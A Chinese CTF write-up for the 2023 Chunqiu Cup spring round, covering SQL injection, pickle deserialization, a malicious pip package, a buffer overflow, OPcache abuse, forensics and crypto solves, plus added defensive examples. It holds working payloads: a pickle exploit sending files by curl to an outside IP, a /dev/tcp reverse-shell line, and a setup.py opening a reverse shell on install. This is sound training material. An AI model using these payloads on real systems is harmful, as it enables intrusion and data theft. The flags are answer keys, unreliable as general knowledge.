
2023 Chunqiu Cup Network Security League, Spring Round

Original

Author: 故里[TRUE]

Published 2023-05-21 21:03:04

Phpstudy

At first I thought this was XSS + CSRF for a reverse shell, but the shell never connected back, so I guessed the login page had SQL injection.

Adding the request header X-Requested-With: XMLHttpRequest gets you into the login page.

SQL injection through the username field to change the password:

```sql
admin' ;UPDATE ADMINS set PASSWORD ='c26be8aaf53b15054896983b43eb6a65';--
```

Then log in as admin/123456.

The scheduled-task feature executes cat /f*.
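The injection above works because the username is pasted straight into the query text and the backend accepts stacked statements. Added example, not code from the write-up or the challenge: the vulnerable pattern next to its parameterized form, on a constructed in-memory sqlite3 ADMINS table. Since sqlite3's execute refuses more than one statement, run_stacked stands in for a driver with multi-statement support; the payload string is the one from the write-up.

```python
import sqlite3

# The payload from the write-up: closes the quoted username, appends an UPDATE,
# and comments out whatever the application appends after it.
STACKED_PAYLOAD = "admin' ;UPDATE ADMINS set PASSWORD ='c26be8aaf53b15054896983b43eb6a65';--"
ORIGINAL_HASH = "0" * 32   # constructed placeholder for the stored password hash


def fresh_db() -> sqlite3.Connection:
    """Constructed in-memory ADMINS table with one account (not the challenge's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ADMINS (USERNAME TEXT PRIMARY KEY, PASSWORD TEXT)")
    conn.execute("INSERT INTO ADMINS VALUES (?, ?)", ("admin", ORIGINAL_HASH))
    conn.commit()
    return conn


def run_stacked(conn: sqlite3.Connection, sql: str) -> None:
    """Stand-in for a driver that accepts stacked statements, which the ';UPDATE ...'
    payload relies on. sqlite3.execute only runs one statement, so each ';'-separated
    piece is executed in turn and a trailing '--' comment is dropped."""
    for stmt in sql.split(";"):
        stmt = stmt.strip()
        if stmt and not stmt.startswith("--"):
            conn.execute(stmt)
    conn.commit()


def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> None:
    """String-built query: attacker-controlled text becomes part of the SQL."""
    run_stacked(conn, f"SELECT PASSWORD FROM ADMINS WHERE USERNAME = '{username}'")


def safe_lookup(conn: sqlite3.Connection, username: str):
    """Parameterized query: the whole payload is compared as one literal username."""
    row = conn.execute("SELECT PASSWORD FROM ADMINS WHERE USERNAME = ?", (username,)).fetchone()
    return row[0] if row else None


def stored_hash(conn: sqlite3.Connection) -> str:
    return conn.execute("SELECT PASSWORD FROM ADMINS WHERE USERNAME = 'admin'").fetchone()[0]


def demo() -> dict:
    """Runs both versions against fresh tables and reports what changed."""
    results = {}
    conn = fresh_db()
    before = stored_hash(conn)
    vulnerable_lookup(conn, STACKED_PAYLOAD)
    results["vulnerable_changed_hash"] = stored_hash(conn) != before
    results["vulnerable_new_hash"] = stored_hash(conn)

    conn = fresh_db()
    before = stored_hash(conn)
    results["safe_matched_row"] = safe_lookup(conn, STACKED_PAYLOAD) is not None
    results["safe_changed_hash"] = stored_hash(conn) != before
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

With the string-built query the admin hash is replaced by the attacker's md5; with the bound parameter the same input simply matches no row and the table is untouched.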

Easypy

A directory scan (Dir) finds a download route; download the source.

The source had been deleted, but a .pyc is left; decompiling it gives the source:

```python
import base64
import numpy  # numpy.loads (old numpy) is an alias of pickle.loads
from flask import Flask, Response, request

app = Flask(__name__)


@app.route('/', methods=['GET', 'POST'])
def index():
    return '小p想要找一个女朋友,你能帮他找找看么?'


@app.route('/girlfriends', methods=['GET', 'POST'])
def girlfriends():
    if request.values.get('data'):
        data = request.values.get('data')
        numpydata = base64.b64decode(data)
        # substring blacklist on the raw pickle bytes
        if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:
            return '不能走捷径啊'
        resp = numpy.loads(numpydata)  # unrestricted unpickling of user input
        return '可以的,要的就是一种感觉'
    return '有进步了,但是不多'


@app.route('/download', methods=['GET', 'POST'])
def download():
    with open('www.zip', 'rb') as f:
        stream = f.read()
    response = Response(stream, content_type='application/octet-stream')
    response.headers['Content-disposition'] = 'attachment;filename=www.zip'
    return response


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
```

The filter blocks R, sh and bash; the usable sink is resp = numpy.loads(numpydata).

Pickle deserialization: hand-craft the opcodes.

Because those characters are filtered, first write the command output to a file, then exfiltrate it to a VPS.

The exploit:

```python
import base64
import pickletools

# protocol-0 opcodes written by hand: MARK, STRING, INST os.system, STOP
a = b'''(S'curl -T 1.txt http://101.42.45.215:5002'
ios
system
.
'''
# a = b'''(S'cat /f*>1.txt'
# ios
# system
# .
# '''
# S'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'
a = pickletools.optimize(a)
print(a)
print(base64.b64encode(a))
```

Pass the base64-encoded content as the parameter, listen on the VPS, and the flag arrives.
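The challenge's substring blacklist fails in both directions: the INST opcode (i) reaches os.system without an R, and harmless data containing "sh" is rejected. Added example, not code from the write-up or the challenge: an allow-list Unpickler whose find_class refuses every global except a few named ones (INST, GLOBAL and STACK_GLOBAL all go through find_class, so nothing is imported or called), plus a static scan with pickletools.genops that lists the globals a pickle would resolve without running it. The sample pickles are constructed here; the one with the write-up's opcode shape carries a harmless echo argument.

```python
import io
import pickle
import pickletools

# Globals the loader may resolve; anything else is refused before import or call.
SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list loader: find_class is consulted for GLOBAL, STACK_GLOBAL and INST alike."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused global {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_is_refused(data: bytes) -> bool:
    """True when the allow-list loader rejects the pickle (nothing gets executed)."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def naive_filter_passes(data: bytes) -> bool:
    """The substring blacklist from the challenge source, reproduced for comparison."""
    return not (b'R' in data or b'bash' in data or b'sh' in data)


def referenced_globals(data: bytes):
    """Static pre-check: (module, name) pairs the pickle would import, without running it."""
    found = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)   # genops joins the two lines with a space
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            found.append(("<from stack>", "<from stack>"))  # protocol 4: names come off the stack
    return found


# Constructed samples (not from the challenge).
# Same opcode shape as the write-up's exploit (MARK, STRING, INST os.system, STOP) but with a
# harmless argument; it contains neither b'R' nor b'sh', so the blacklist lets it through.
INST_PAYLOAD = b"(S'echo hello'\nios\nsystem\n."
# Ordinary data a real client might send.
BENIGN = pickle.dumps({"user": "alice", "roles": ["reader"]}, protocol=0)
# Ordinary data the blacklist wrongly rejects because 'sh' appears inside a name.
FALSE_POSITIVE = pickle.dumps("Ashley", protocol=0)


if __name__ == "__main__":
    print("blacklist passes INST payload:", naive_filter_passes(INST_PAYLOAD))
    print("globals it would resolve:", referenced_globals(INST_PAYLOAD))
    print("allow-list loader refuses it:", loads_is_refused(INST_PAYLOAD))
    print("benign data round-trips:", restricted_loads(BENIGN))
    print("blacklist passes 'Ashley':", naive_filter_passes(FALSE_POSITIVE))
```

The static scan is useful as a logging or detection step in front of the loader, but the allow-list loader is the actual control: pickle has no safe mode, and filtering the byte stream can only ever chase individual opcodes.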

happy2forensic

Export the HTTP objects:

Rename the result to a zip archive and get:

Loading it in Forensics Master (取证大师) reveals BitLocker encryption:

Following the hint, filter on tcp.srcport == 20 && tcp.dstport == 80.

Extracting it gives: bitlocker:120483-350966-299189-055297-225478-133463-431684-359403

Decrypting gives:

There are many images, and the trial version of Forensics Master cannot extract them all at once. One image is very large; extract it.

Run foremost on it:

Stitch the pieces together with magick montage:

Guessing that it is password:856a-a56b6a705653

flag2:-919c-a140d7054ac5

Mount it with AXIOM Process:

Flag1:f97d5b05-d312-46ac

Concatenating gives flag{f97d5b05-d312-46ac-919c-a140d7054ac5}

盲人会藏在哪里

Add the file header and get the password:

ChunJiSai7k7kbibi@!

This yields the Kunkun image:

Check it with zsteg:

Found an "ag{"; extract it and take a look:

flag{2c8ba897-0205-9bff-123d-281d12a24c38}

p2048

```python
from pwn import *

p = remote('39.106.65.236', 29728)
p.sendline(b't' * 0x400)   # oversized input for the game's read
p.interactive()
```

Play a few rounds and the overflow lands on the backdoor function.

flag{3834fe18-932d-4b34-9427-57565f0a803c}

piphack

Upload a malicious Python package:

```python
from setuptools import setup
import socket, subprocess, os


def con():
  # runs at install time, before setup() is even reached
  import socket, time, pty, os
  host = '101.42.45.215'
  port = 7788
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.settimeout(10)
  s.connect((host, port))
  os.dup2(s.fileno(), 0)
  os.dup2(s.fileno(), 1)
  os.dup2(s.fileno(), 2)
  os.putenv("HISTFILE", '/dev/null')
  pty.spawn("/bin/bash")
  s.close()


con()
setup(name="root", version="1.0")
```

Zip it, rename it to .png, bypass the filter by changing h to H, listen on the port, point pip at that address and have it download the png.

The shell connects back and gives the flag.

flag{4661747e-c7ed-4d2e-a2ee-315243be16a8}
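The package above shows why pip installing an arbitrary source distribution is code execution: setup.py runs with the installer's privileges before setup() is reached. Added example, not code from the write-up: a static review of a setup.py with the ast module that flags imports of networking or terminal modules, module-level calls other than setup(), and attribute names typical of descriptor redirection or shell spawning. The suspect-module list is a heuristic chosen for this example, and both setup.py samples are constructed (203.0.113.10 is a documentation address).

```python
import ast

# Modules a build script has little reason to import; heuristic list for this example.
SUSPECT_MODULES = {"socket", "pty", "subprocess", "ctypes", "urllib", "http", "requests"}
# Attribute names that suggest descriptor redirection or a spawned shell.
SUSPECT_ATTRS = {"dup2", "spawn", "connect"}


def _callee_name(func: ast.expr) -> str:
    """Dotted name of a call target, e.g. 'setup' or 'os.system'."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return _callee_name(func.value) + "." + func.attr
    return "<expr>"


def audit_setup_py(source: str):
    """Static review of a setup.py; returns human-readable findings (empty means nothing flagged)."""
    tree = ast.parse(source)
    findings = []
    for node in ast.walk(tree):
        # 1. imports of suspect modules anywhere in the file, including inside functions
        if isinstance(node, ast.Import):
            names = [alias.name.split(".")[0] for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [(node.module or "").split(".")[0]]
        else:
            names = []
        for mod in names:
            if mod in SUSPECT_MODULES:
                findings.append(f"line {node.lineno}: imports {mod}")
        # 2. attribute accesses typical of a reverse shell body
        if isinstance(node, ast.Attribute) and node.attr in SUSPECT_ATTRS:
            findings.append(f"line {node.lineno}: uses .{node.attr}()")
    # 3. module-level calls other than setup(): code that runs on install regardless of metadata
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            callee = _callee_name(stmt.value.func)
            if callee != "setup":
                findings.append(f"line {stmt.lineno}: top-level call to {callee}()")
    return findings


# Constructed samples (not from the challenge or the write-up).
BENIGN_SETUP = '''\
from setuptools import setup, find_packages
setup(name="example", version="1.0", packages=find_packages())
'''

SUSPECT_SETUP = '''\
from setuptools import setup
import socket, os, pty
def con():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("203.0.113.10", 4444))
    os.dup2(s.fileno(), 0)
    pty.spawn("/bin/sh")
con()
setup(name="root", version="1.0")
'''


if __name__ == "__main__":
    print("benign:", audit_setup_py(BENIGN_SETUP))
    for finding in audit_setup_py(SUSPECT_SETUP):
        print("suspect:", finding)
```

A check like this belongs in a pre-install gate or a package-proxy scanner; the stronger controls are installing only wheels from a vetted index and never running pip against a URL an application user controls.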

php_again

Reference: "Getting a shell through PHP's OPcache mechanism" (利用PHP的OPcache机制getshell) | Chybeta

Underscores cannot be bypassed with [; use . instead.

The OPcache cache path is /tmp; the server has opcache.file_cache_only enabled and opcache.validate_timestamps disabled.

GoSecure/php7-opcache-override: Security-related PHP7 OPcache abuse tools and demo (github.com)

Then the valid values for this case are, in order: 0.0 73 7 1365 777777

Construct a directory-traversal write via the zip extraction, with the correct timestamp. The path is ../../../../../tmp/8131f93e8d92a77c0a8ff12ef84b05b1/var/www/html/index.php.bin; it overwrites the cached data of the original index.php and gives a shell.

The timestamp can be taken from the www.zip that was read; download the zip locally.

Adjust the time to get the timestamp.

Then you need an index.php.bin, which requires building the same environment as the challenge locally, php-8.2.2-apache, with docker.

After building it, go in and modify this:

/usr/local/etc/php

```
zend_extension=/usr/local/lib/php/extensions/no-debug-non-zts-20220829/opcache.so
```

(the extension is present by default; you only need to load the .so)

```
opcache.file_cache => /tmp => /tmp
opcache.enable => On => On
opcache.validate_timestamps => On => On
opcache.file_cache_only => 1 => 1
```

After the change, restart with service apache2 restart.

Online timestamp converter: 码工具 (matools.com)

Target (remote):

```
PHP version : 8.2.2
Zend Extension ID : API420220929,NTS
Zend Bin ID : BIN_48888
Assuming x86_64 architecture
------------
System ID : 0f79c4aa63d189f1791711bf763f665a
```

Local:

```
PHP version : 8.2.2
Zend Extension ID : API420220829,NTS
Zend Bin ID : BIN_48888
Assuming x86_64 architecture
------------
System ID : afa4539c4004328fa36a41c0ec790101
```

I didn't finish this challenge in the end; still learning.

checkin

Part 1: solve the Pell equation to get x and y.

```python
# Sage script: continued_fraction, sqrt and the ^ power operator are Sage, not plain Python
def solve_pell(N, numTry=100):
    a = []
    b = []
    cf = continued_fraction(sqrt(N))
    for i in range(numTry):
        denom = cf.denominator(i)
        numer = cf.numerator(i)
        if numer^2 - N * denom^2 == 1:   # convergent p/q with p^2 - N*q^2 = 1
            a.append(numer)
            b.append(denom)
    return a, b


N = 1117
a, b = solve_pell(N)
print(b)
```
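The Sage script walks the convergents of sqrt(N) until one satisfies x^2 - N y^2 = 1. Added example, not code from the write-up: the same method in plain Python integers, using the standard recurrence for the continued fraction of sqrt(D) so it runs without Sage, plus the composition rule that produces further solutions from the fundamental one. The write-up's x and y are included only so they can be checked against the equation; the small cases D = 2, 7 and 61 are there as sanity checks.

```python
from math import isqrt


def pell_fundamental(D: int):
    """Smallest positive (x, y) with x^2 - D*y^2 = 1, found on the convergents p/q of sqrt(D).
    Every solution is a convergent, so the first convergent that satisfies the equation is
    the fundamental one."""
    a0 = isqrt(D)
    if a0 * a0 == D:
        raise ValueError("D must not be a perfect square")
    m, d, a = 0, 1, a0            # state of the periodic continued fraction of sqrt(D)
    p_prev, p = 1, a0             # convergent numerators  p_{-1}, p_0
    q_prev, q = 0, 1              # convergent denominators q_{-1}, q_0
    while p * p - D * q * q != 1:
        m = d * a - m             # next partial quotient a_n
        d = (D - m * m) // d
        a = (a0 + m) // d
        p_prev, p = p, a * p + p_prev
        q_prev, q = q, a * q + q_prev
    return p, q


def is_pell_solution(D: int, x: int, y: int) -> bool:
    return x * x - D * y * y == 1


def next_solution(D: int, x: int, y: int, x1: int, y1: int):
    """(x + y*sqrt(D)) * (x1 + y1*sqrt(D)) expanded: the next solution after (x, y)
    when (x1, y1) is the fundamental one."""
    return x * x1 + D * y * y1, x * y1 + y * x1


# values quoted in the write-up for D = 1117
WRITEUP_X = 87897747594260774254246835664214545379849
WRITEUP_Y = 2629972211566463612149241455626172190220

if __name__ == "__main__":
    x, y = pell_fundamental(1117)
    print("fundamental solution for 1117:", x, y)
    print("write-up values satisfy the equation:", is_pell_solution(1117, WRITEUP_X, WRITEUP_Y))
    print("write-up values are the fundamental solution:", (x, y) == (WRITEUP_X, WRITEUP_Y))
```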

Then apply the binomial theorem directly to recover the flag.

```python
from Crypto.Util.number import *

n = 14381700422128582509148801752355744589949207890477326887251636389639477554903212313766087310581920423926674144511237847467160303159477932732842314969782540035709454603184976310835433114879043016737665256729350745769071186849072915716081380191025215059636548339167264601163525017898164466972776553148697204889820118261937316228241099344357088387154112255824092894798716597134811437852876763391697588672779069166285303075312833415574850549277205130215394422655325352478386576833373623679069271857652029364332047485797407322257853316210866532938722911480593571175419708834718860211036796987231227104370259051299799633809
enc1 = 7213976567554002619445032200800186986758840297933991288547009708561953107405266725278346810536664670987171549114913443730366439254199110599202411546254632702440251000149674899033994570393935743323319736976929843596350656674709510612789987746895513057821629144725499933366382123251520676386059405796801097683107223771674383940907066300331503757142088898427893069444164604408189686282018392714450005250018004986102062209998463347007934222341910941474212611569508001910685822097788669516018081617394144015000387497289693096617795809933540456797387940627782045397249431573540932386564021712811633992948508497879189416719996092292320828635490820907122756459412206735413770335545012892724496210585503157766011075566023635046144730429791359690237088629187946232458937292767085665897489251315749496284368726255508362410603108788759785472319449267909859926786774679533591222665476101832482161295321411313525830843915966136814748249906589458905410141906965538387896747375546846618213595165688661941876715858338407833641907024891922856719044736945863722003318526031957256722493189062624177017279248142024760515092698242159769372410662895078523142768353100643884341413944795392762315999109544070401451087596138520908569234305384182336436670714204963907240715652950621301644972412252424876159530992
enc2 = 15954854445966181136742750543358176358186230663706091821454832527034640100670779737656720251005109942306013877086451482243141488450122353285697850016200364912263403464109626937525725210545566742746628476797261121321515812788726862118315480354196115424526212965145342675007815411995594752584377871686965531829990461770047418586001518916553661158567047779694730702789677326905844275827365395845945286695577426050334364557405151339008293258932006267159313380746863008928500607405457044370494583863960981060999695448408234857505591647503423149271589648863473472196402149897680041851877198062464480400493467334040101779732999029043327947071232256187123316057998759518569161852646625701393295408789279678540894319137126821001853808931387200759810381958895695749251834840804088478214013923869059004663359509316215974475427057000629842098545503905230785431115754636129549758888267877395566717448365986552725726428222769339088308242580851434964429627168365161743834285778996916154182286570122208454025753108647581888781783757375011437394936853319184725324597963035778640646869326035848170752766298225095197226934969602554875402243303906613183431896300664684256018886119255870435413622515792072064528098344111446380223430819596310173312668368618931885819458529703118195242890075359424013033800260927722161030183373647798407301688760998313223874318513944409702828538509864933624724225689414495687466779277994989628367119101
D = 1117
x = 87897747594260774254246835664214545379849
y = 2629972211566463612149241455626172190220
# first part of the flag: the linear term of the binomial expansion, taken modulo n^2
p = (enc1 - 1) // (233 * n**2)
enc2 = enc2 % (n**2)
p1 = (enc2 - 1) // (y * n)
print(long_to_bytes(p) + long_to_bytes(p1))
# flag{11e89e28-4e27-47f0-a7c7-8e66c18881be}
```

backdoor

z can be written out directly, and then key can be solved.

```python
# Sage script: EllipticCurve and GF are Sage, not plain Python
from Crypto.Util.number import *
from Crypto.Util.Padding import pad
from random import randint
from Crypto.Util.strxor import strxor
from Crypto.Cipher import AES
from hashlib import sha256
from hashlib import md5

(w, a, b, x) = (31889563, 31153, 28517, 763220531)
(A, B, P) = (1064988096, 802063264240, 12565302212045582769124388577074506881895777499095598016237085270545754804754108580101112266821575105979557524040668050927829331647411956215940656838233527)
G = (359297413048687497387015267480858122712978942384458634636826020013871463646849523577260820163767471924019580831592309960165276513810592046624940283279131, 9290586933629395882565073588501573863992359052743649536992808088692463307334265060644810911389976524008568647496608901222631270760608733724291675910247770)
M1 = (10930305358553250299911486296334290816447877698513318419802777123689138630792465404548228252534960885714060411282825155604339364568677765849414624286307139, 7974701243567912294657709972665114029771010872297725947444110914737157017082782484356147938296124777392629435915168481799494053881335678760116023075462921)
M2 = (497353451039150377961380023736260648366248764299414896780530627602565037872686230259859191906258041016214805015473019277626331812412272940029276101709693, 8439756863534455395772111050047162924667310322829095861192323688205133726655589045018003963413676473738236408975953021037765999542116607686218566948766462)
B_ = (5516900502352630982628557924432908395278078868116449817099410694627060720635892997830736032175084336697081211958825053352950153336574705799801251193930256, 10314456103976125214338213393161012551632498638755274752918126246399488480437083278584365543698685202192543021224052941574332651066234126608624976216302370)
c = b'\x1a\xfb\xa2\xe1\x86\x04\xfak\x9a\xa3\xd15\xb8\x16\x1d\xbc\xa9S\xf5;\xfa\xf1\x08dn~\xd4\x94\xa4;^*\xf6\xd7\xf10\xa3\xe1k`\x1f-\xef\x80\x16\x80\x80\xe2'

E = EllipticCurve(GF(P), [A, B])
G = E(G)
M1 = E(M1)
M2 = E(M2)
B_ = E(B_)
# z expressed directly from the published points and the known constants
z = M1 - w*G - a*x*M1 - x*b*G
k2 = sha256(str(z[0]).encode()).digest()[:6]
k2 = bytes_to_long(k2)
shared_key2 = k2 * B_
key = md5(str(int(shared_key2[0])).encode()).digest()
cipher = AES.new(key, AES.MODE_ECB)
ct = cipher.decrypt(c)
print(ct)
# flag{63259ab8-4916-4095-8888-d92c2b003e18}
```

Original statement: this article is published on the Tencent Cloud Developer Community with the author's authorization and may not be reproduced without permission.

For infringement concerns, contact cloudcommunity@tencent.com for removal.
